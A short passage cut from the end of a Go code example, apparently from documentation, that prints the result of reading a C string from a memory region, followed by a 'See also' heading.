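	fmt.Printf("%q\n", cStringInRegion(region, base, 0))      // outside the region
}
```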

See also